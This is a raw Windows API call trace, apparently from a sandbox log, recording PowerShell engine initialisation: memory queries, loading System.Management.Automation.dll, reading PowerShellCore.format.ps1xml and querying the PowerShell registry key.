	[0286.596] VirtualQuery (in: lpAddress=0x12bae0, lpBuffer=0x12c9a0, dwLength=0x30 | out: lpBuffer=0x12c9a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.596] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.596] VirtualQuery (in: lpAddress=0x12bae0, lpBuffer=0x12c9a0, dwLength=0x30 | out: lpBuffer=0x12c9a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.596] VirtualQuery (in: lpAddress=0x12bb70, lpBuffer=0x12ca30, dwLength=0x30 | out: lpBuffer=0x12ca30*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.596] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.597] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.597] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.597] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.597] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.597] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.597] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.597] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x8f069a46, Data2=0x1bba, Data3=0x4241, Data4=([0]=0x8c, [1]=0xbc, [2]=0x32, [3]=0x3, [4]=0x1, [5]=0x1f, [6]=0xef, [7]=0xd))) returned 0x0
	[0286.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.598] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.598] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.598] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.598] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.598] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.598] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.598] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12b7a0, lpBuffer=0x12c660, dwLength=0x30 | out: lpBuffer=0x12c660*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.599] VirtualQuery (in: lpAddress=0x12bb60, lpBuffer=0x12ca20, dwLength=0x30 | out: lpBuffer=0x12ca20*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.600] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x39f33f51, Data2=0xb189, Data3=0x425f, Data4=([0]=0x94, [1]=0xe8, [2]=0x9e, [3]=0xfc, [4]=0x92, [5]=0x54, [6]=0x0, [7]=0x55))) returned 0x0
	[0286.600] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x193404c3, Data2=0x21f9, Data3=0x4da4, Data4=([0]=0x98, [1]=0x81, [2]=0x17, [3]=0x5d, [4]=0xdc, [5]=0x5c, [6]=0xf8, [7]=0x2f))) returned 0x0
	[0286.600] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x82558d08, Data2=0x24f3, Data3=0x4ae8, Data4=([0]=0xac, [1]=0xc, [2]=0x96, [3]=0x11, [4]=0xdd, [5]=0xb3, [6]=0xc8, [7]=0x24))) returned 0x0
	[0286.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.601] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xebb7209a, Data2=0x3b2a, Data3=0x4be5, Data4=([0]=0xb7, [1]=0x50, [2]=0x89, [3]=0x1, [4]=0x11, [5]=0x9c, [6]=0xda, [7]=0x7f))) returned 0x0
	[0286.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.602] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x9851cfc9, Data2=0xe969, Data3=0x4c86, Data4=([0]=0x83, [1]=0xe7, [2]=0x26, [3]=0xc7, [4]=0xaf, [5]=0xb0, [6]=0x1c, [7]=0xc))) returned 0x0
	[0286.602] VirtualQuery (in: lpAddress=0x12b8b0, lpBuffer=0x12c770, dwLength=0x30 | out: lpBuffer=0x12c770*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.602] VirtualQuery (in: lpAddress=0x12b940, lpBuffer=0x12c800, dwLength=0x30 | out: lpBuffer=0x12c800*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.602] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x2207fc1, Data2=0x6e7, Data3=0x47c9, Data4=([0]=0xa4, [1]=0x43, [2]=0xb1, [3]=0xe7, [4]=0x93, [5]=0x23, [6]=0xc5, [7]=0xe5))) returned 0x0
	[0286.602] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x6c43648, Data2=0x4d39, Data3=0x4a38, Data4=([0]=0xa9, [1]=0x80, [2]=0xf7, [3]=0xa, [4]=0x7e, [5]=0x20, [6]=0xdb, [7]=0xf0))) returned 0x0
	[0286.602] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x520f9080, Data2=0xd17f, Data3=0x4ae1, Data4=([0]=0x8f, [1]=0xa6, [2]=0x61, [3]=0x70, [4]=0x62, [5]=0x3b, [6]=0x32, [7]=0x8b))) returned 0x0
	[0286.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.603] SetErrorMode (uMode=0x1) returned 0x1
	[0286.603] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300
	[0286.603] GetFileType (hFile=0x300) returned 0x1
	[0286.603] SetErrorMode (uMode=0x1) returned 0x1
	[0286.603] GetFileType (hFile=0x300) returned 0x1
	[0286.604] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.604] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.604] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.604] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.604] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.604] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.605] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.605] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.605] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.606] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.606] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.606] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.606] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.607] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.607] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.607] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.607] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.607] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.608] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.608] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.608] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x1000, lpOverlapped=0x0) returned 1
	[0286.608] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0xe67, lpOverlapped=0x0) returned 1
	[0286.609] ReadFile (in: hFile=0x300, lpBuffer=0x303ddd7, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303ddd7*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0286.609] ReadFile (in: hFile=0x300, lpBuffer=0x303e808, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d098, lpOverlapped=0x0 | out: lpBuffer=0x303e808*, lpNumberOfBytesRead=0x12d098*=0x0, lpOverlapped=0x0) returned 1
	[0286.609] CloseHandle (hObject=0x300) returned 1
	[0286.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.609] SetErrorMode (uMode=0x1) returned 0x1
	[0286.609] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d040 | out: lpFileInformation=0x12d040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0286.609] SetErrorMode (uMode=0x1) returned 0x1
	[0286.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.610] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d128 | out: phkResult=0x12d128*=0x300) returned 0x0
	[0286.610] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d0ac, lpData=0x0, lpcbData=0x12d0a8*=0x0 | out: lpType=0x12d0ac*=0x1, lpData=0x0, lpcbData=0x12d0a8*=0x56) returned 0x0
	[0286.610] CoTaskMemAlloc (cb=0x5a) returned 0x271660
	[0286.610] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d07c, lpData=0x271660, lpcbData=0x12d078*=0x56 | out: lpType=0x12d07c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d078*=0x56) returned 0x0
	[0286.610] CoTaskMemFree (pv=0x271660) 
	[0286.610] RegCloseKey (hKey=0x300) returned 0x0
	[0286.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0286.611] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x543efad6, Data2=0xf402, Data3=0x4f15, Data4=([0]=0x84, [1]=0x11, [2]=0x7e, [3]=0x3e, [4]=0xa9, [5]=0xd9, [6]=0xb7, [7]=0x71))) returned 0x0
	[0286.611] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0x110f838f, Data2=0x72bf, Data3=0x4340, Data4=([0]=0x87, [1]=0xa6, [2]=0x28, [3]=0x13, [4]=0xfd, [5]=0xa6, [6]=0xbd, [7]=0xbc))) returned 0x0
	[0286.612] CoCreateGuid (in: pguid=0x12d350 | out: pguid=0x12d350*(Data1=0xe1a946dd, Data2=0x2d70, Data3=0x4210, Data4=([0]=0x9c, [1]=0xd1, [2]=0x8f, [3]=0x36, [4]=0xa9, [5]=0x84, [6]=0x9e, [7]=0x17))) returned 0x0
